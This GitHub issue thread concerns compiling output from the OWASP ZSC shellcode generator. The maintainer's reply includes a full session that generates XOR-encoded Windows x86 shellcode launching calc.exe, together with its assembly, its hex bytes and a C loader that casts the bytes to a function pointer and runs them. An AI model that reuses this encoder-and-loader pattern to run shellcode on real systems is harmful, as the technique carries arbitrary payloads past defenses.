
compiling

Open moaeddy opened this issue 7 years ago • 4 comments

I am trying to compile this into an executable, but I am getting the errors below.

||=== Build: Release in QA (compiler: GNU GCC Compiler) ===| C:~\Documents\QA\main.c|1|error: expected identifier or '(' before '=' token| c:\program files (x86)\codeblocks\mingw\include\stdio.h|191|error: unknown type name 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|207|error: unknown type name 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|211|error: unknown type name 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|319|error: unknown type name 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|320|error: unknown type name 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|331|error: unknown type name 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|332|error: unknown type name 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|412|error: expected ',' or ';' before 'fread'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|413|error: expected ',' or ';' before 'fwrite'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|565|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|568|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|605|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|606|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\stdio.h|609|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|36|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|37|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|38|error: expected declaration specifiers or '...' 
before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|39|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|40|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|46|error: expected ',' or ';' before 'strcspn'| c:\program files (x86)\codeblocks\mingw\include\string.h|49|error: expected ',' or ';' before 'strlen'| c:\program files (x86)\codeblocks\mingw\include\string.h|50|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|51|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|52|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|55|error: expected ',' or ';' before 'strspn'| c:\program files (x86)\codeblocks\mingw\include\string.h|58|error: expected ',' or ';' before 'strxfrm'| c:\program files (x86)\codeblocks\mingw\include\string.h|65|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|66|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|72|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|73|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|77|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|80|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|81|error: expected declaration specifiers or '...' 
before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|90|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|91|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|103|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|104|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|107|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|110|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|115|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|131|error: expected ',' or ';' before 'wcscspn'| c:\program files (x86)\codeblocks\mingw\include\string.h|133|error: expected ',' or ';' before 'wcslen'| c:\program files (x86)\codeblocks\mingw\include\string.h|134|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|135|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|136|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|139|error: expected ',' or ';' before 'wcsspn'| c:\program files (x86)\codeblocks\mingw\include\string.h|142|error: expected ',' or ';' before 'wcsxfrm'| c:\program files (x86)\codeblocks\mingw\include\string.h|156|error: expected declaration specifiers or '...' before 'size_t'| c:\program files (x86)\codeblocks\mingw\include\string.h|157|error: expected declaration specifiers or '...' 
before 'size_t'| ||More errors follow but not being shown.| ||Edit the max errors limit in compiler options...| ||=== Build failed: 50 error(s), 0 warning(s) (0 minute(s), 0 second(s)) ===|

moaeddy avatar Jul 22 '18 12:07 moaeddy

Hi,

can you please share the file or the command you used for generating the shellcode?

Regards.

Ali-Razmjoo avatar Jul 22 '18 12:07 Ali-Razmjoo

listen.zip

attached is the generated file

moaeddy avatar Jul 23 '18 13:07 moaeddy

I have been waiting for your response. Can't this be compiled into an .exe?

moaeddy avatar Aug 02 '18 09:08 moaeddy

Hi, sorry for my late answer. You encoded the file incorrectly: it has eval(some value) at the end, which has nothing to do with a .c file or with shellcode.

  • here is a sample command
  ______          __      _____ _____    ______ _____  _____
 / __ \ \        / /\    / ____|  __ \  |___  // ____|/ ____|
| |  | \ \  /\  / /  \  | (___ | |__) |    / /| (___ | |
| |  | |\ \/  \/ / /\ \  \___ \|  ___/    / /  \___ \| |
| |__| | \  /\  / ____ \ ____) | |       / /__ ____) | |____
 \____/   \/  \/_/    \_\_____/|_|      /_____|_____/ \_____|


                OWASP ZeroDay Cyber Research Shellcoder

zsc> shellcode
zsc/shellcode> generate
zsc/shellcode/generate>
linux_x86      osx_x86        windows_x86    windows_x86_64
zsc/shellcode/generate> w
windows_x86    windows_x86_64
zsc/shellcode/generate> windows_x86
zsc/shellcode/generate/windows_x86> exec
zsc/shellcode/generate/windows_x86/exec> file_to_execute
file_to_execute> test/calc.exe

[+] file_to_execute set to "test/calc.exe"

[+] none
[+] xor_random
[+] add_random
[+] sub_random
[+] xor_yourvalue
[+] inc
[+] dec
[+] inc_timesyouwant
[+] dec_timesyouwant
[+] add_yourvalue
[+] sub_yourvalue


[+] enter encode type
zsc/shellcode/generate/windows_x86/exec/encode_type> xo
xor_random    xor_yourvalue
zsc/shellcode/generate/windows_x86/exec/encode_type> xor_random

Output assembly code?(y or n)> y


xor    %ecx,%ecx
mov    %fs:0x30(%ecx),%eax
mov    0xc(%eax),%eax
mov    0x14(%eax),%esi
lods   %ds:(%esi),%eax
xchg   %eax,%esi
lods   %ds:(%esi),%eax
mov    0x10(%eax),%ebx
mov    0x3c(%ebx),%edx
add    %ebx,%edx
mov    0x78(%edx),%edx
add    %ebx,%edx
mov    0x20(%edx),%esi
add    %ebx,%esi
xor    %ecx,%ecx
inc    %ecx
lods   %ds:(%esi),%eax
add    %ebx,%eax
cmpl   $0x50746547,(%eax)
jne    23 <.text+0x23>
cmpl   $0x41636f72,0x4(%eax)
jne    23 <.text+0x23>
cmpl   $0x65726464,0x8(%eax)
jne    23 <.text+0x23>
mov    0x24(%edx),%esi
add    %ebx,%esi
mov    (%esi,%ecx,2),%cx
dec    %ecx
mov    0x1c(%edx),%esi
add    %ebx,%esi
mov    (%esi,%ecx,4),%edx
add    %ebx,%edx
push   %ebx
push   %edx
xor    %ecx,%ecx
push   %ecx
mov    $0x61636578,%ecx
push   %ecx
subl   $0x61,0x3(%esp)

push %ebx
push $0x684b6641
pop %ebx
push $0x2d250f16
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx

push   %esp
push   %ebx
call   *%edx
add    $0x8,%esp
pop    %ecx
push   %eax
xor    %ecx,%ecx
push   %ecx

push %ebx
push $0x346c7a53
pop %ebx
push $0x51fceac3
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx

pop %ecx
shr    $0x10,%ecx
shr    $0x8,%ecx
push %ecx


push %ebx
push $0x64454f35
pop %ebx
push $0x1c206156
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx


push %ebx
push $0x71366243
pop %ebx
push $0x1d57016c
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx


push %ebx
push $0x634c6159
pop %ebx
push $0x173f042d
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx


xor    %ebx,%ebx
mov    %esp,%ebx
xor    %ecx,%ecx
inc    %ecx
push   %ecx
push   %ebx
call   *%eax
add    $0x18,%esp
pop    %edx
pop    %ebx
xor    %ecx,%ecx
mov    $0x61737365,%ecx
push   %ecx
subl   $0x61,0x3(%esp)

push %ebx
push $0x4e525274
pop %ebx
push $0x2d3d2024
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx


push %ebx
push $0x42687743
pop %ebx
push $0x36010f06
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx

push   %esp
push   %ebx
call   *%edx
xor    %ecx,%ecx
push   %ecx
call   *%eax


Output shellcode to screen?(y or n)> y
[+] Generated shellcode is:
\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x53\x52\x31\xc9\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x49\x31\x7a\x57\x5b\x68\x1e\x58\x14\x12\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x53\x68\x46\x49\x77\x49\x5b\x68\xd6\xd9\xe7\x2c\x59\x31\xd9\x5b\x51\x59\xc1\xe9\x10\xc1\xe9\x08\x51\x53\x68\x57\x6b\x43\x6f\x5b\x68\x34\x45\x26\x17\x59\x31\xd9\x5b\x51\x53\x68\x35\x6c\x37\x51\x5b\x68\x1a\x0f\x56\x3d\x59\x31\xd9\x5b\x51\x53\x68\x79\x4c\x6b\x53\x5b\x68\x0d\x29\x18\x27\x59\x31\xd9\x5b\x51\x31\xdb\x89\xe3\x31\xc9\x41\x51\x53\xff\xd0\x83\xc4\x18\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x76\x73\x56\x43\x5b\x68\x26\x01\x39\x20\x59\x31\xd9\x5b\x51\x53\x68\x48\x41\x37\x50\x5b\x68\x0d\x39\x5e\x24\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0

Shellcode output to a .c file?(y or n)> y
Target .c file?> shellcode.c
[+] File saved as shellcode.c .
zsc> wrong input!
[!] interrupted by user!
Exit

C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>type shellcode.c
#include <stdio.h>
#include <string.h>
/*
This shellcode generated by OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
http://zsc.z3r0d4y.com/
owasp-zsc[at]googlegroups[dot]com

Title: exec('test/calc.exe')
OS: windows_x86
Encode: xor_random
Length: 278
Assembly code:


xor    %ecx,%ecx
mov    %fs:0x30(%ecx),%eax
mov    0xc(%eax),%eax
mov    0x14(%eax),%esi
lods   %ds:(%esi),%eax
xchg   %eax,%esi
lods   %ds:(%esi),%eax
mov    0x10(%eax),%ebx
mov    0x3c(%ebx),%edx
add    %ebx,%edx
mov    0x78(%edx),%edx
add    %ebx,%edx
mov    0x20(%edx),%esi
add    %ebx,%esi
xor    %ecx,%ecx
inc    %ecx
lods   %ds:(%esi),%eax
add    %ebx,%eax
cmpl   $0x50746547,(%eax)
jne    23 <.text+0x23>
cmpl   $0x41636f72,0x4(%eax)
jne    23 <.text+0x23>
cmpl   $0x65726464,0x8(%eax)
jne    23 <.text+0x23>
mov    0x24(%edx),%esi
add    %ebx,%esi
mov    (%esi,%ecx,2),%cx
dec    %ecx
mov    0x1c(%edx),%esi
add    %ebx,%esi
mov    (%esi,%ecx,4),%edx
add    %ebx,%edx
push   %ebx
push   %edx
xor    %ecx,%ecx
push   %ecx
mov    $0x61636578,%ecx
push   %ecx
subl   $0x61,0x3(%esp)
push   $0x456e6957
push   %esp
push   %ebx
call   *%edx
add    $0x8,%esp
pop    %ecx
push   %eax
xor    %ecx,%ecx
push   %ecx
push $0x65909090
pop %ecx
shr    $0x10,%ecx
shr    $0x8,%ecx
push %ecx

push $0x78652e63
push $0x6c61632f
push $0x74736574

xor    %ebx,%ebx
mov    %esp,%ebx
xor    %ecx,%ecx
inc    %ecx
push   %ecx
push   %ebx
call   *%eax
add    $0x18,%esp
pop    %edx
pop    %ebx
xor    %ecx,%ecx
mov    $0x61737365,%ecx
push   %ecx
subl   $0x61,0x3(%esp)
push   $0x636f7250
push   $0x74697845
push   %esp
push   %ebx
call   *%edx
xor    %ecx,%ecx
push   %ecx
call   *%eax




compile example(osx_x86): gcc -m32  -o shellcode_compiled shellcode.c
compile example(linux_x86): gcc -m32  -z execstack -o shellcode_compiled shellcode.c
compile example(windows_x86): gcc -o shellcode_compiled.exe shellcode.c
followed by(to run): ./shellcode_compiled or shellcode_compiled.exe
*/



/*
 * Payload bytes as written by the generator. The header comment above records
 * "Length: 278" and "Encode: xor_random" for this literal.
 *
 * NOTE(review): the assembly in the header comment shows plain pushes
 * (e.g. `push $0x456e6957`), while these bytes contain the encoded
 * push/pop/xor sequences (`\x53\x68 .. \x5b\x68 .. \x59\x31\xd9\x5b\x51`).
 * The header listing is therefore not a byte-for-byte description of this
 * literal; audit the bytes themselves (disassemble them) rather than
 * trusting the comment.
 *
 * This is a non-const char * to a string literal: the compiler appends a
 * terminating NUL, and the bytes must not be written through this pointer.
 */
char *shellcode = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x53\x52\x31\xc9\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x49\x31\x7a\x57\x5b\x68\x1e\x58\x14\x12\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x53\x68\x46\x49\x77\x49\x5b\x68\xd6\xd9\xe7\x2c\x59\x31\xd9\x5b\x51\x59\xc1\xe9\x10\xc1\xe9\x08\x51\x53\x68\x57\x6b\x43\x6f\x5b\x68\x34\x45\x26\x17\x59\x31\xd9\x5b\x51\x53\x68\x35\x6c\x37\x51\x5b\x68\x1a\x0f\x56\x3d\x59\x31\xd9\x5b\x51\x53\x68\x79\x4c\x6b\x53\x5b\x68\x0d\x29\x18\x27\x59\x31\xd9\x5b\x51\x31\xdb\x89\xe3\x31\xc9\x41\x51\x53\xff\xd0\x83\xc4\x18\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x76\x73\x56\x43\x5b\x68\x26\x01\x39\x20\x59\x31\xd9\x5b\x51\x53\x68\x48\x41\x37\x50\x5b\x68\x0d\x39\x5e\x24\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0";
/*
 * Test harness: reinterprets the bytes behind `shellcode` as a function with
 * no declared parameters and no return value, and calls it once.
 *
 * ISO C does not define conversion between object pointers and function
 * pointers, so this relies entirely on platform behaviour. The bytes sit in
 * a string literal, i.e. in a data section; where data pages are mapped
 * non-executable (DEP/NX) the call faults instead of running. That is
 * presumably why the header's linux_x86 example passes `-z execstack`.
 *
 * Returns 0 only if the called bytes return to this function.
 */
int main(void)
{
        /* Hold the cast result in a named pointer instead of calling it inline. */
        void (*entry)() = (void (*)())shellcode;

        entry();
        return 0;
}

C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>

Did you use jsfuck encoding or something similar by accident? That is a JavaScript encoding, so it is not going to work for the C language. (Check line 113 of the file you attached.)

Ali-Razmjoo avatar Aug 05 '18 11:08 Ali-Razmjoo